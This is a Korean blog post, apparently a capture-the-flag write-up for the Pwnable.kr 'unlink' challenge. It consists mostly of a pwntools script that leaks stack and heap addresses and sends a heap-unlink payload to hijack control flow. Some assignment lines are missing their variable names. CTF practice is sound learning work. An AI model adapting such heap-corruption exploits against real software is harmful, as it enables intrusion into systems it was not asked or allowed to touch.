Notice
Recent Posts
Recent Comments
«   2024/12   »
1 2 3 4 5 6 7
8 9 10 11 12 13 14
15 16 17 18 19 20 21
22 23 24 25 26 27 28
29 30 31
Today
Total
관리 메뉴

9oat's LAB

[Pwnable.kr] unlink 본문

Write Up/Pwnable.kr

[Pwnable.kr] unlink

90at 2017. 8. 27. 18:30
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
from pwn import *
from struct import *
 
= lambda x: pack("<L", x)
up = lambda x: unpack("<L", x)[0]
 
proc = process('/home/goat/Desktop/unlink')
wait = raw_input()
pay = ''
= int(proc.recvline().split(': ')[1], 0)
= int(proc.recvline().split(': ')[1], 0)
proc.recvline()
print '[+] leak stack(ebp-0x14):', hex(s)
print '[+] leak heap(obj A):', hex(h)
= s - 0x1c
= h + 0xc
print '[+] Unlink\'s SFP:', hex(s)
print '[+] OBJ A\'s Buf:', hex(h)
pay += p(h + 0xc)
pay += p(h)
pay += "A" * 4
pay += p(0x080484eb)
pay += p(h)
pay += p(s)
proc.send(pay)
proc.interactive()
cs


오래걸렸다

아직 많이 서투른 듯

저작자표시 비영리

'Write Up > Pwnable.kr' 카테고리의 다른 글

[Pwnable.kr] coin1  (0) 2017.08.03
[Pwnable.kr] input  (0) 2017.07.16
공유하기 링크
'Write Up/Pwnable.kr' Related Articles more
Comments